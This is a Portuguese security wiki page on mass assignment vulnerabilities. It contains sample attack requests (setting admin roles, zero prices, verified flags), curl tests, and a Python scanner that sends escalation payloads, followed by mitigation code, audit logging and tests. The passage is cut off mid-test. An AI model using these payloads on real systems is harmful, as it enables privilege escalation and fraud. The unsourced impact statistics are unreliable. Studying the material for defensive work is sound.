# Mass Assignment

Mass Assignment é uma vulnerabilidade que ocorre quando frameworks de aplicação web permitem automaticamente que parâmetros de requisição HTTP sejam vinculados a propriedades de modelos de domínio, sem a devida validação de quais campos podem ser modificados.

### Princípio de Funcionamento

```
Requisição HTTP → Framework Binding → Atribuição Automática → Propriedades Modificadas
      ↓                 ↓                    ↓                     ↓
Atacante envia    Framework associa    Campos são definidos   Campos sensíveis
campos extras     parâmetros a        automaticamente no     são modificados
                  propriedades        objeto                 indevidamente
```

### Características do Mass Assignment

* **Explora a convenção sobre configuração** de frameworks modernos
* **Permite modificação de campos sensíveis** não destinados ao usuário
* **Frequentemente negligenciada** em desenvolvimento ágil
* **Pode levar a escalação de privilégios** e violação de dados

### Frameworks Vulneráveis Comuns

| Framework         | Linguagem  | Mecanismo Vulnerável |
| ----------------- | ---------- | -------------------- |
| **Ruby on Rails** | Ruby       | `params.permit!`     |
| **Spring Boot**   | Java       | `@ModelAttribute`    |
| **Laravel**       | PHP        | `$request->all()`    |
| **Django**        | Python     | `form.save()`        |
| **ASP.NET MVC**   | C#         | `UpdateModel()`      |
| **Express.js**    | JavaScript | `req.body`           |

***

## ⚔️ Mecanismos de Vulnerabilidade

### Fluxo de Ataque Mass Assignment

```mermaid
sequenceDiagram
    participant A as Atacante
    participant F as Frontend
    participant B as Backend (Framework)
    participant M as Modelo de Dados
    participant DB as Banco de Dados

    Note over A,DB: FASE 1: Comportamento Normal
    F->>B: Requisição com campos permitidos
    Note right of F: { "name": "John", "email": "john@email.com" }
    B->>M: Vincula parâmetros ao modelo
    M->>DB: Salva apenas campos permitidos
    DB->>M: Confirma persistência
    M->>B: Retorna objeto atualizado
    B->>F: Resposta com dados seguros

    Note over A,DB: FASE 2: Exploração Mass Assignment
    A->>B: Requisição com campos maliciosos
    Note right of A: { "name": "John", "email": "john@email.com",<br>"role": "admin", "is_active": true }
    B->>B: Processa requisição sem validação
    B->>M: Vincula TODOS os parâmetros
    Note left of B: Framework associa<br>automaticamente todos<br>os campos do request
    M->>DB: Salva campos sensíveis modificados
    Note left of DB: role='admin', is_active=true<br>persistidos no banco
    DB->>M: Confirma persistência completa
    M->>B: Retorna objeto com privilégios elevados
    B->>A: Resposta com confirmação do ataque

    Note over A,DB: FASE 3: Consequências
    A->>A: Verifica privilégios obtidos
    A->>B: Acessa funcionalidades administrativas
    B->>DB: Consultas com privilégios elevados
    DB->>B: Retorna dados sensíveis
    B->>A: Entrega informações privilegiadas

    Note over A,DB: FASE 4: Persistência
    A->>B: Continua explorando com novos privilégios
    B->>DB: Modifica mais dados sensíveis
    DB->>B: Confirma alterações
    B->>A: Feedback das ações maliciosas
```

### Cenário 1: Elevação de Privilégios em User Registration

```http
POST /users HTTP/1.1
Host: vulnerable-app.com
Content-Type: application/json

{
  "username": "attacker",
  "password": "password123",
  "email": "attacker@evil.com",
  "role": "admin",
  "is_active": true,
  "email_verified": true
}
```

**Backend Vulnerável (Ruby on Rails):**

```ruby
# CONTROLLER VULNERÁVEL
class UsersController < ApplicationController
  def create
    # ⚠️ PERIGO: Mass assignment sem whitelist
    @user = User.new(params[:user])
    
    if @user.save
      render json: @user, status: :created
    else
      render json: @user.errors, status: :unprocessable_entity
    end
  end
end

# MODEL
class User < ApplicationRecord
  # Campos: username, password, email, role, is_active, email_verified
end
```

### Cenário 2: Modificação de Preços em E-commerce

```http
PATCH /products/123 HTTP/1.1
Host: online-store.com
Content-Type: application/json
Authorization: Bearer user_token

{
  "name": "Produto A",
  "description": "Descrição atualizada",
  "price": 0.01,  // ⚠️ Preço modificado
  "discounted_price": 0.00
}
```

### Cenário 3: Bypass de Verificação de Email

```http
PUT /api/profile HTTP/1.1
Host: social-app.com
Content-Type: application/json

{
  "name": "Usuário Malicioso",
  "email": "hacker@evil.com",
  "email_verified": true,  // ⚠️ Bypass da verificação
  "account_activated": true
}
```

### Cenário 4: Injeção de Dados em Relacionamentos

```http
POST /orders HTTP/1.1
Host: ecommerce.com
Content-Type: application/json

{
  "items": [
    {"product_id": 1, "quantity": 2}
  ],
  "user_id": 999,  // ⚠️ Modifica relacionamento
  "status": "paid",
  "total_amount": 0.50
}
```

***

## 🔎 Identificação e Detecção

### Indicadores de Vulnerabilidade

```bash
# Sinais de aplicação vulnerável
- Uso de métodos como update_attributes(), save(), create() sem whitelist
- Parâmetros sendo passados diretamente para modelos
- Ausência de strong parameters ou whitelisting
- Frameworks que fazem binding automático
- APIs que aceitam JSON/XML com campos arbitrários
```

### Padrões de Código Vulnerável

```python
# Django - PERIGOSO
def update_user(request, user_id):
    user = User.objects.get(pk=user_id)
    user.update(**request.POST)  # ⚠️ Mass assignment
    return HttpResponse("Updated")

# Django - SEGURO
def update_user(request, user_id):
    user = User.objects.get(pk=user_id)
    form = UserForm(request.POST, instance=user)
    if form.is_valid():
        form.save()  # ✅ Apenas campos do form
    return HttpResponse("Updated")
```

### Metodologia de Teste Manual

{% stepper %}
{% step %}

### Teste Básico de Mass Assignment

```bash
# Testar criação de usuário com campos extras
curl -X POST http://target.com/api/users \
  -H "Content-Type: application/json" \
  -d '{
    "username": "testuser",
    "password": "testpass",
    "email": "test@test.com",
    "role": "admin",
    "is_admin": true
  }'

# Testar atualização de perfil
curl -X PUT http://target.com/api/profile \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer <token>" \
  -d '{
    "name": "Updated Name",
    "email_verified": true,
    "premium_user": true
  }'
```

{% endstep %}

{% step %}

### Script de Detecção Automatizada

```python
#!/usr/bin/env python3
# mass_assignment_scanner.py

import requests
import json
import argparse
from urllib.parse import urljoin

class MassAssignmentScanner:
    """
    Scanner para detecção de vulnerabilidades Mass Assignment
    """
    
    def __init__(self, target_url):
        self.target_url = target_url
        self.session = requests.Session()
        self.vulnerabilities = []
        
        # Campos sensíveis comuns para teste
        self.sensitive_fields = [
            'role', 'admin', 'is_admin', 'is_active',
            'email_verified', 'account_verified',
            'permissions', 'privileges', 'type',
            'status', 'active', 'verified',
            'price', 'amount', 'balance',
            'user_id', 'owner_id', 'created_by'
        ]

    def test_user_registration(self):
        """Testar endpoint de registro de usuário"""
        endpoint = '/api/users'
        url = urljoin(self.target_url, endpoint)
        
        # Payload base
        base_payload = {
            'username': 'testuser_' + str(hash(url)),
            'password': 'TestPassword123!',
            'email': f'test{hash(url)}@test.com'
        }
        
        # Adicionar campos sensíveis
        test_payload = base_payload.copy()
        for field in self.sensitive_fields:
            test_payload[field] = 'admin' if 'role' in field or 'admin' in field else True
        
        print(f"[*] Testando registro de usuário em: {url}")
        
        try:
            response = self.session.post(
                url,
                json=test_payload,
                headers={'Content-Type': 'application/json'},
                timeout=10
            )
            
            if self.analyze_registration_response(response, test_payload):
                print(f"[!] Vulnerabilidade detectada em registro de usuário")
                self.vulnerabilities.append({
                    'endpoint': endpoint,
                    'type': 'USER_REGISTRATION',
                    'payload': test_payload,
                    'response_status': response.status_code
                })
                
        except Exception as e:
            print(f"[!] Erro testando registro: {e}")

    def test_profile_update(self, auth_token=None):
        """Testar endpoint de atualização de perfil"""
        endpoint = '/api/profile'
        url = urljoin(self.target_url, endpoint)
        
        # Payload base
        base_payload = {
            'name': 'Updated Name',
            'bio': 'Test bio'
        }
        
        # Adicionar campos sensíveis
        test_payload = base_payload.copy()
        for field in self.sensitive_fields:
            if field not in ['role', 'admin']:  # Evitar campos muito óbvios
                test_payload[field] = True
        
        headers = {'Content-Type': 'application/json'}
        if auth_token:
            headers['Authorization'] = f'Bearer {auth_token}'
        
        print(f"[*] Testando atualização de perfil em: {url}")
        
        try:
            response = self.session.put(
                url,
                json=test_payload,
                headers=headers,
                timeout=10
            )
            
            if self.analyze_update_response(response, test_payload):
                print(f"[!] Vulnerabilidade detectada em atualização de perfil")
                self.vulnerabilities.append({
                    'endpoint': endpoint,
                    'type': 'PROFILE_UPDATE',
                    'payload': test_payload,
                    'response_status': response.status_code
                })
                
        except Exception as e:
            print(f"[!] Erro testando atualização: {e}")

    def test_object_creation(self, endpoint, base_payload):
        """Testar criação de objetos genéricos"""
        url = urljoin(self.target_url, endpoint)
        
        test_payload = base_payload.copy()
        for field in self.sensitive_fields:
            test_payload[field] = 'test_value'
        
        print(f"[*] Testando criação em: {url}")
        
        try:
            response = self.session.post(
                url,
                json=test_payload,
                headers={'Content-Type': 'application/json'},
                timeout=10
            )
            
            if self.analyze_creation_response(response, test_payload):
                print(f"[!] Vulnerabilidade detectada em {endpoint}")
                self.vulnerabilities.append({
                    'endpoint': endpoint,
                    'type': 'OBJECT_CREATION',
                    'payload': test_payload,
                    'response_status': response.status_code
                })
                
        except Exception as e:
            print(f"[!] Erro testando criação: {e}")

    def analyze_registration_response(self, response, payload):
        """Analisar resposta de registro"""
        if response.status_code in [200, 201]:
            try:
                response_data = response.json()
                
                # Verificar se campos sensíveis foram aceitos
                for field in self.sensitive_fields:
                    if field in payload and field in str(response_data):
                        return True
                
                # Verificar se usuário foi criado com privilégios
                if 'role' in str(response_data) and 'admin' in str(response_data).lower():
                    return True
                    
            except json.JSONDecodeError:
                # Se não é JSON, verificar no texto
                response_text = response.text.lower()
                if any(field in response_text for field in ['role', 'admin', 'privilege']):
                    return True
        
        return False

    def analyze_update_response(self, response, payload):
        """Analisar resposta de atualização"""
        if response.status_code in [200, 201]:
            try:
                response_data = response.json()
                
                # Verificar se campos sensíveis foram atualizados
                for field in self.sensitive_fields:
                    if field in payload:
                        if field in response_data:
                            if response_data[field] == payload[field]:
                                return True
                
            except json.JSONDecodeError:
                # Análise baseada em texto
                pass
        
        return False

    def analyze_creation_response(self, response, payload):
        """Analisar resposta de criação"""
        return self.analyze_update_response(response, payload)

    def comprehensive_scan(self):
        """Executar scan abrangente"""
        print(f"[*] Iniciando scan Mass Assignment em: {self.target_url}")
        
        # Testar endpoints comuns
        self.test_user_registration()
        self.test_profile_update()
        
        # Testar outros endpoints comuns
        common_endpoints = [
            '/api/products',
            '/api/orders', 
            '/api/posts',
            '/api/comments'
        ]
        
        for endpoint in common_endpoints:
            self.test_object_creation(endpoint, {'name': 'Test Object'})

    def generate_report(self):
        """Gerar relatório de vulnerabilidades"""
        return {
            'target_url': self.target_url,
            'vulnerabilities_found': len(self.vulnerabilities),
            'vulnerabilities': self.vulnerabilities
        }

# Uso do scanner
if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='Scanner de Mass Assignment')
    parser.add_argument('target', help='URL alvo')
    
    args = parser.parse_args()
    
    scanner = MassAssignmentScanner(args.target)
    scanner.comprehensive_scan()
    
    report = scanner.generate_report()
    print(f"\n[+] Scan completo. Vulnerabilidades: {report['vulnerabilities_found']}")
    
    for vuln in report['vulnerabilities']:
        print(f"  - {vuln['type']} em {vuln['endpoint']}")
```

{% endstep %}
{% endstepper %}

### Técnicas de Detecção Avançadas

{% stepper %}
{% step %}

### Análise de Campos Dinâmicos

```python
def discover_sensitive_fields(target_url, endpoint):
    """Descobrir campos sensíveis através de enumeração"""
    common_sensitive = [
        'role', 'permission', 'access', 'level', 'type',
        'status', 'active', 'verified', 'confirmed',
        'price', 'cost', 'amount', 'balance',
        'owner', 'author', 'creator', 'user_id'
    ]
    
    discovered_fields = []
    
    for field in common_sensitive:
        test_payload = {field: 'test_value'}
        
        try:
            response = requests.post(
                f"{target_url}{endpoint}",
                json=test_payload
            )
            
            if response.status_code == 200:
                discovered_fields.append(field)
                
        except Exception as e:
            continue
    
    return discovered_fields
```

{% endstep %}

{% step %}

### Teste com Diferentes Content-Types

```python
def test_multiple_content_types(target_url, endpoint, payload):
    """Testar Mass Assignment com diferentes content types"""
    content_types = [
        ('application/json', json.dumps(payload)),
        ('application/x-www-form-urlencoded', payload),
        ('application/xml', dict_to_xml(payload)),
        ('text/xml', dict_to_xml(payload))
    ]
    
    for content_type, data in content_types:
        try:
            response = requests.post(
                f"{target_url}{endpoint}",
                data=data,
                headers={'Content-Type': content_type}
            )
            
            if response.status_code == 200:
                print(f"[!] Vulnerável com Content-Type: {content_type}")
                
        except Exception as e:
            continue
```

{% endstep %}
{% endstepper %}

***

## 💥 Exploração e Impacto

### Técnicas de Exploração Avançadas

{% stepper %}
{% step %}

### Elevação de Privilégios em Aplicações Web

```http
POST /api/users/register HTTP/1.1
Host: admin-panel.com
Content-Type: application/json

{
  "username": "hacker",
  "password": "Password123!",
  "email": "hacker@evil.com",
  "role": "super_admin",
  "permissions": ["user:read", "user:write", "admin:all"],
  "is_staff": true,
  "is_superuser": true,
  "email_verified": true,
  "account_activated": true
}
```

{% endstep %}

{% step %}

### Manipulação de Dados Financeiros

```http
PATCH /api/orders/123 HTTP/1.1
Host: ecommerce-site.com
Content-Type: application/json
Authorization: Bearer user_token

{
  "status": "paid",
  "payment_status": "completed",
  "total_amount": 1.00,
  "discount_amount": 99.00,
  "shipping_cost": 0.00,
  "tax_amount": 0.00
}
```

{% endstep %}

{% step %}

### Bypass de Controles de Acesso

```http
PUT /api/articles/456 HTTP/1.1
Host: cms-platform.com
Content-Type: application/json

{
  "title": "Artigo Hackeado",
  "content": "Conteúdo malicioso",
  "published": true,
  "approved": true,
  "featured": true,
  "author_id": 999,
  "created_at": "2024-01-01T00:00:00Z"
}
```

{% endstep %}

{% step %}

### Injeção em Relacionamentos

```http
POST /api/teams HTTP/1.1
Host: collaboration-app.com
Content-Type: application/json

{
  "name": "Time Malicioso",
  "description": "Descrição",
  "members": [
    {"user_id": 1, "role": "owner"},
    {"user_id": 999, "role": "admin"}
  ],
  "settings": {
    "private": false,
    "allow_public_join": true
  }
}
```

{% endstep %}
{% endstepper %}

### Impacto do Mass Assignment

#### Cenários de Ataque e Impacto

```json
{
  "privilege_escalation": {
    "impacto": "Crítico",
    "cenario": "Usuário comum obtém privilégios administrativos",
    "consequencias": [
      "Acesso a dados sensíveis de todos os usuários",
      "Capacidade de modificar configurações do sistema",
      "Execução de operações administrativas",
      "Comprometimento completo da aplicação"
    ]
  },
  "data_manipulation": {
    "impacto": "Alto",
    "cenario": "Modificação não autorizada de dados",
    "consequencias": [
      "Alteração de preços em e-commerce",
      "Modificação de estados de pedidos",
      "Bypass de verificações de segurança",
      "Violação de integridade de dados"
    ]
  },
  "business_logic_bypass": {
    "impacto": "Alto", 
    "cenario": "Contornar regras de negócio",
    "consequencias": [
      "Bypass de verificações de email",
      "Ativação antecipada de contas",
      "Acesso a recursos premium sem pagamento",
      "Violação de fluxos de trabalho"
    ]
  },
  "relationship_injection": {
    "impacto": "Médio-Alto",
    "cenario": "Manipulação de relacionamentos entre entidades",
    "consequencias": [
      "Associação não autorizada a recursos",
      "Acesso a dados através de relacionamentos",
      "Violação de isolamento de dados",
      "Comprometimento de multi-tenancy"
    ]
  }
}
```

#### Estatísticas de Impacto

```
- 25% das aplicações web possuem vulnerabilidades de Mass Assignment
- Tempo médio para exploração: 2-5 horas
- Taxa de sucesso em aplicações customizadas: 60%
- Impacto financeiro médio: $50,000 por incidente
```

***

## 🛡️ Mitigação e Correção

### Estratégias de Defesa em Camadas

{% stepper %}
{% step %}

### Whitelisting de Parâmetros

**Ruby on Rails - Strong Parameters**

```ruby
class UsersController < ApplicationController
  def create
    # ✅ SEGURO: Whitelist explícita
    user_params = params.require(:user).permit(
      :username, 
      :password, 
      :email,
      :name
      # Campos sensíveis como :role, :admin NÃO estão na whitelist
    )
    
    @user = User.new(user_params)
    
    if @user.save
      render json: @user, status: :created
    else
      render json: @user.errors, status: :unprocessable_entity
    end
  end
  
  def update
    @user = User.find(params[:id])
    
    # ✅ Whitelist específica para atualização
    user_params = params.require(:user).permit(
      :name, 
      :email, 
      :bio,
      :avatar
    )
    
    if @user.update(user_params)
      render json: @user
    else
      render json: @user.errors, status: :unprocessable_entity
    end
  end
end
```

**Django - Forms e ModelForms**

```python
# forms.py
from django import forms
from .models import User

class UserRegistrationForm(forms.ModelForm):
    class Meta:
        model = User
        fields = ['username', 'password', 'email', 'name']  # ✅ Whitelist
        # Campos como 'role', 'is_admin' NÃO estão incluídos
        
    def save(self, commit=True):
        user = super().save(commit=False)
        user.set_password(self.cleaned_data['password'])
        if commit:
            user.save()
        return user

# views.py
from django.shortcuts import render
from .forms import UserRegistrationForm

def register_user(request):
    if request.method == 'POST':
        form = UserRegistrationForm(request.POST)
        if form.is_valid():
            user = form.save()
            return render(request, 'registration/success.html')
    else:
        form = UserRegistrationForm()
    
    return render(request, 'registration/register.html', {'form': form})
```

{% endstep %}

{% step %}

### Spring Boot - DTOs e Validation

```java
// UserDTO.java - Data Transfer Object
public class UserDTO {
    @NotBlank
    @Size(min = 3, max = 50)
    private String username;
    
    @NotBlank
    @Email
    private String email;
    
    @NotBlank
    @Size(min = 8)
    private String password;
    
    // ✅ Apenas campos permitidos - sem role, admin, etc.
    
    // Getters e Setters
    public String getUsername() { return username; }
    public void setUsername(String username) { this.username = username; }
    
    public String getEmail() { return email; }
    public void setEmail(String email) { this.email = email; }
    
    public String getPassword() { return password; }
    public void setPassword(String password) { this.password = password; }
}

// UserController.java
@RestController
@RequestMapping("/api/users")
public class UserController {
    
    @Autowired
    private UserService userService;
    
    @PostMapping
    public ResponseEntity<User> createUser(@Valid @RequestBody UserDTO userDTO) {
        // ✅ Usar DTO em vez de entidade diretamente
        User user = userService.createUser(userDTO);
        return ResponseEntity.ok(user);
    }
    
    @PatchMapping("/{id}")
    public ResponseEntity<User> updateUser(
            @PathVariable Long id, 
            @Valid @RequestBody UserUpdateDTO updateDTO) {
        // ✅ DTO específico para atualização
        User user = userService.updateUser(id, updateDTO);
        return ResponseEntity.ok(user);
    }
}
```

{% endstep %}

{% step %}

### Node.js/Express - Validação com Joi

```javascript
const Joi = require('joi');

// Schemas de validação
const userRegistrationSchema = Joi.object({
  username: Joi.string().alphanum().min(3).max(30).required(),
  email: Joi.string().email().required(),
  password: Joi.string().min(8).required(),
  name: Joi.string().max(100)
  // ✅ Apenas campos permitidos
});

const userUpdateSchema = Joi.object({
  name: Joi.string().max(100),
  email: Joi.string().email(),
  bio: Joi.string().max(500),
  avatar: Joi.string().uri()
  // ✅ Campos sensíveis não incluídos
});

// Middleware de validação
const validateUserRegistration = (req, res, next) => {
  const { error } = userRegistrationSchema.validate(req.body);
  if (error) {
    return res.status(400).json({ error: error.details[0].message });
  }
  next();
};

const validateUserUpdate = (req, res, next) => {
  const { error } = userUpdateSchema.validate(req.body);
  if (error) {
    return res.status(400).json({ error: error.details[0].message });
  }
  next();
};

// Rotas
app.post('/api/users', validateUserRegistration, async (req, res) => {
  try {
    // ✅ req.body já validado - apenas campos permitidos
    const user = await User.create(req.body);
    res.status(201).json(user);
  } catch (error) {
    res.status(400).json({ error: error.message });
  }
});

app.patch('/api/users/:id', validateUserUpdate, async (req, res) => {
  try {
    const user = await User.findByPk(req.params.id);
    if (!user) {
      return res.status(404).json({ error: 'User not found' });
    }
    
    // ✅ Apenas campos validados serão atualizados
    await user.update(req.body);
    res.json(user);
  } catch (error) {
    res.status(400).json({ error: error.message });
  }
});
```

{% endstep %}
{% endstepper %}

### Padrões de Segurança Avançados

{% stepper %}
{% step %}

### Object-Relational Mapping (ORM) Seguro

```python
# models.py - Django
from django.db import models
from django.contrib.auth.models import AbstractUser

class User(AbstractUser):
    # Campos base
    username = models.CharField(max_length=150, unique=True)
    email = models.EmailField(unique=True)
    
    # Campos sensíveis com valores padrão seguros
    is_staff = models.BooleanField(default=False)
    is_superuser = models.BooleanField(default=False)
    is_active = models.BooleanField(default=False)
    email_verified = models.BooleanField(default=False)
    
    class Meta:
        # ✅ Prevenir atualização em massa de campos sensíveis
        permissions = [
            ("can_change_sensitive_fields", "Can change sensitive user fields"),
        ]

# serializers.py - Django REST Framework
from rest_framework import serializers
from .models import User

class UserRegistrationSerializer(serializers.ModelSerializer):
    class Meta:
        model = User
        fields = ['username', 'email', 'password', 'first_name', 'last_name']
        extra_kwargs = {
            'password': {'write_only': True}
        }
    
    def create(self, validated_data):
        # ✅ Garantir valores padrão para campos sensíveis
        validated_data['is_active'] = False
        validated_data['email_verified'] = False
        user = User.objects.create_user(**validated_data)
        return user

class UserUpdateSerializer(serializers.ModelSerializer):
    class Meta:
        model = User
        fields = ['first_name', 'last_name', 'email', 'bio']
        # ✅ Apenas campos não sensíveis para atualização
```

{% endstep %}

{% step %}

### Sistema de Auditoria e Logging

```python
# audit.py
import logging
from django.db.models.signals import post_save
from django.dispatch import receiver
from django.contrib.auth.models import User

class MassAssignmentAudit:
    def __init__(self):
        self.logger = logging.getLogger('mass_assignment_audit')
    
    def log_suspicious_activity(self, request, model, fields_modified):
        """Registrar atividade suspeita de Mass Assignment"""
        sensitive_fields = ['role', 'is_admin', 'permissions', 'is_staff']
        
        suspicious_fields = [field for field in fields_modified if field in sensitive_fields]
        
        if suspicious_fields:
            log_entry = {
                'timestamp': timezone.now().isoformat(),
                'user_id': request.user.id if request.user.is_authenticated else 'anonymous',
                'ip_address': self.get_client_ip(request),
                'model': model.__class__.__name__,
                'suspicious_fields': suspicious_fields,
                'all_fields_modified': fields_modified,
                'user_agent': request.META.get('HTTP_USER_AGENT', ''),
                'severity': 'HIGH'
            }
            
            self.logger.warning(f"Tentativa de Mass Assignment: {log_entry}")
            
            # Alertar administradores se necessário
            if len(suspicious_fields) > 0:
                self.alert_admins(log_entry)

# Signal para detectar saves suspeitos
@receiver(post_save)
def audit_model_save(sender, instance, created, **kwargs):
    # Verificar se é um modelo que nos interessa
    if sender.__name__ in ['User', 'Product', 'Order']:
        # Implementar lógica de auditoria
        pass
```

{% endstep %}

{% step %}

### Validação em Múltiplas Camadas

```javascript
// multi_layer_validation.js
class MassAssignmentProtection {
    constructor() {
        this.sensitiveFields = [
            'role', 'permissions', 'isAdmin', 'isStaff',
            'emailVerified', 'accountActive', 'balance',
            'price', 'cost', 'ownerId', 'createdBy'
        ];
    }

    // Camada 1: Validação de entrada
    validateInput(input, allowedFields) {
        const invalidFields = Object.keys(input).filter(
            field => !allowedFields.includes(field)
        );
        
        if (invalidFields.length > 0) {
            throw new Error(`Campos não permitidos: ${invalidFields.join(', ')}`);
        }
        
        return true;
    }

    // Camada 2: Filtragem de dados
    filterSensitiveFields(data) {
        const filtered = { ...data };
        
        this.sensitiveFields.forEach(field => {
            if (field in filtered) {
                delete filtered[field];
            }
        });
        
        return filtered;
    }

    // Camada 3: Validação de negócio
    validateBusinessRules(user, operation, data) {
        const violations = [];
        
        // Verificar se usuário tem permissão para modificar campos sensíveis
        if (!user.isAdmin) {
            const modifiedSensitiveFields = Object.keys(data).filter(
                field => this.sensitiveFields.includes(field)
            );
            
            if (modifiedSensitiveFields.length > 0) {
                violations.push(
                    `Usuário não admin tentou modificar campos sensíveis: ${modifiedSensitiveFields.join(', ')}`
                );
            }
        }
        
        return violations;
    }

    // Método principal de proteção
    secureUpdate(user, targetObject, updateData, allowedFields) {
        // Camada 1: Validação de entrada
        this.validateInput(updateData, allowedFields);
        
        // Camada 2: Filtragem
        const filteredData = this.filterSensitiveFields(updateData);
        
        // Camada 3: Validação de negócio
        const violations = this.validateBusinessRules(user, 'update', updateData);
        
        if (violations.length > 0) {
            throw new Error(`Violações de segurança: ${violations.join('; ')}`);
        }
        
        // Aplicar atualização segura
        Object.assign(targetObject, filteredData);
        return targetObject;
    }
}

// Uso
const protection = new MassAssignmentProtection();
const allowedFields = ['name', 'email', 'bio', 'avatar'];

try {
    const secureData = protection.secureUpdate(
        currentUser, 
        userProfile, 
        requestBody, 
        allowedFields
    );
    await userProfile.save();
} catch (error) {
    res.status(400).json({ error: error.message });
}
```

{% endstep %}
{% endstepper %}

### Configuração de Framework Segura

#### Django - Configurações Globais

```python
# settings.py
# Desabilitar funcionalidades perigosas
DATA_UPLOAD_MAX_NUMBER_FIELDS = 1000  # Limitar número de campos

# Configurações de segurança
SECURE_BROWSER_XSS_FILTER = True
SECURE_CONTENT_TYPE_NOSNIFF = True

# Middleware de segurança
MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    # ... outros middlewares
]

# Configuração REST Framework
REST_FRAMEWORK = {
    'DEFAULT_PARSER_CLASSES': [
        'rest_framework.parsers.JSONParser',
        'rest_framework.parsers.FormParser',
    ],
    'DEFAULT_RENDERER_CLASSES': [
        'rest_framework.renderers.JSONRenderer',
    ]
}
```

#### Spring Boot - Configuração de Segurança

```java
// application.properties
# Desabilitar binding automático de campos
spring.mvc.ignore-default-model-on-redirect=true

# Configuração de segurança
security.ignored=/**
management.security.enabled=true

// Configuração Web
@Configuration
@EnableWebSecurity
public class SecurityConfig extends WebSecurityConfigurerAdapter {
    
    @Override
    protected void configure(HttpSecurity http) throws Exception {
        http
            .csrf().disable() // Apenas se usando stateless API
            .authorizeRequests()
            .antMatchers("/api/**").authenticated()
            .and()
            .httpBasic();
    }
    
    @Bean
    public WebMvcConfigurer webMvcConfigurer() {
        return new WebMvcConfigurer() {
            @Override
            public void addArgumentResolvers(List<HandlerMethodArgumentResolver> resolvers) {
                // Configurar resolvers seguros
            }
        };
    }
}
```

***

## 🔧 Ferramentas e Testes

### Ferramentas de Análise Estática

#### Scanner de Código para Mass Assignment

```python
#!/usr/bin/env python3
# static_mass_assignment_scanner.py

import ast
import os
import re

class StaticMassAssignmentScanner:
    """
    Scanner estático para detectar padrões vulneráveis de Mass Assignment
    """
    
    def __init__(self):
        self.vulnerable_patterns = {
            'python': [
                (r'\.update\(.*request\.', 'Update com request data'),
                (r'\.create\(.*request\.', 'Create com request data'),
                (r'ModelName\(.*request\.', 'Model instantiation com request'),
                (r'save\(.*\)', 'Save sem validação explícita'),
            ],
            'ruby': [
                (r'update_attributes', 'update_attributes sem whitelist'),
                (r'User\.new\(params\[:user\]\)', 'User.new com params'),
                (r'assign_attributes', 'assign_attributes sem whitelist'),
                (r'params\.permit\!', 'params.permit! (permite tudo)'),
            ],
            'javascript': [
                (r'\.update\(req\.body\)', 'Update com req.body completo'),
                (r'\.create\(req\.body\)', 'Create com req.body completo'),
                (r'Object\.assign\(.*req\.body\)', 'Object.assign com req.body'),
                (r'spread operator.*req\.body', 'Spread operator com req.body'),
            ]
        }
    
    def scan_file(self, file_path):
        """Escanear arquivo individual"""
        vulnerabilities = []
        
        try:
            with open(file_path, 'r', encoding='utf-8') as f:
                content = f.read()
            
            # Determinar linguagem
            file_ext = os.path.splitext(file_path)[1]
            language = self.get_language_from_extension(file_ext)
            
            if language in self.vulnerable_patterns:
                for pattern, description in self.vulnerable_patterns[language]:
                    matches = re.finditer(pattern, content, re.IGNORECASE)
                    for match in matches:
                        vulnerabilities.append({
                            'file': file_path,
                            'line': self.get_line_number(content, match.start()),
                            'pattern': pattern,
                            'description': description,
                            'code_snippet': match.group(0)
                        })
                        
        except Exception as e:
            print(f"Erro ao escanear {file_path}: {e}")
        
        return vulnerabilities
    
    def scan_directory(self, directory):
        """Escanear diretório completo"""
        all_vulnerabilities = []
        
        for root, dirs, files in os.walk(directory):
            for file in files:
                if self.is_source_file(file):
                    file_path = os.path.join(root, file)
                    vulnerabilities = self.scan_file(file_path)
                    all_vulnerabilities.extend(vulnerabilities)
        
        return all_vulnerabilities
    
    def get_language_from_extension(self, extension):
        """Determinar linguagem pela extensão do arquivo"""
        mapping = {
            '.py': 'python',
            '.rb': 'ruby',
            '.js': 'javascript',
            '.java': 'java',
            '.php': 'php',
            '.cs': 'csharp'
        }
        return mapping.get(extension, 'unknown')
    
    def is_source_file(self, filename):
        """Verificar se é arquivo de código fonte"""
        source_extensions = ['.py', '.rb', '.js', '.java', '.php', '.cs']
        return any(filename.endswith(ext) for ext in source_extensions)
    
    def get_line_number(self, content, position):
        """Obter número da linha baseado na posição"""
        return content[:position].count('\n') + 1

# Uso
scanner = StaticMassAssignmentScanner()
vulnerabilities = scanner.scan_directory('/path/to/your/code')

for vuln in vulnerabilities:
    print(f"[!] {vuln['file']}:{vuln['line']} - {vuln['description']}")
    print(f"    Código: {vuln['code_snippet']}")
```

### Testes de Integração

#### Testes Automatizados para Mass Assignment

```python
# tests/test_mass_assignment.py
import pytest
from django.test import TestCase
from django.contrib.auth.models import User
from rest_framework.test import APIClient
from rest_framework import status

class TestMassAssignmentProtection(TestCase):
    
    def setUp(self):
        self.client = APIClient()
        self.user = User.objects.create_user(
            username='testuser',
            password='testpass123',
            email='test@example.com'
        )
        self.client.force_authenticate(user=self.user)
    
    def test_user_cannot_elevate_privileges(self):
        """Testar que usuário não pode elevar próprios privilégios"""
        payload = {
            'username': 'testuser',
            'email': 'test@example.com',
            'is_staff': True,  # ⚠️ Campo sensível
            'is_superuser': True  # ⚠️ Campo sensível
        }
        
        response = self.client.patch('/api/users/me/', payload)
        
        # Verificar que campos sensíveis não foram modificados
        self.user.refresh_from_db()
        self.assertFalse(self.user.is_staff)
        self.assertFalse(self.user.is_superuser)
        self.assertEqual(response.status_code, status.HTTP_200_OK)
    
    def test_admin_required_for_sensitive_fields(self):
        """Testar que apenas admins podem modificar campos sensíveis"""
        payload = {
            'username': 'regularuser',
            'is_staff': True
        }
        
        # Usuário regular
        regular_user = User.objects.create_user(
            username='regular',
            password='pass123'
        )
        self.client.force_authenticate(user=regular_user)
        
        response = self.client.patch('/api/users/1/', payload)
        
        # Deve retornar erro de permissão
        self.assertIn(response.status_code, [status.HTTP_403_FORBIDDEN, status.HTTP_400_BAD_REQUEST])
    
    def test_whitelist_respected_in_registration(self):
        """Testar que whitelist é respeitada no registro"""
        payload = {
            'username': 'newuser',
            'password': 'newpass123',
            'email': 'new@example.com',
            'role': 'admin',  # ⚠️ Campo não permitido
            'is_active': True  # ⚠️ Campo não permitido
        }
        
        response = self.client.post('/api/users/register/', payload)
        
        if response.status_code == status.HTTP_201_CREATED:
            # Se criou, verificar que campos sensíveis não foram definidos
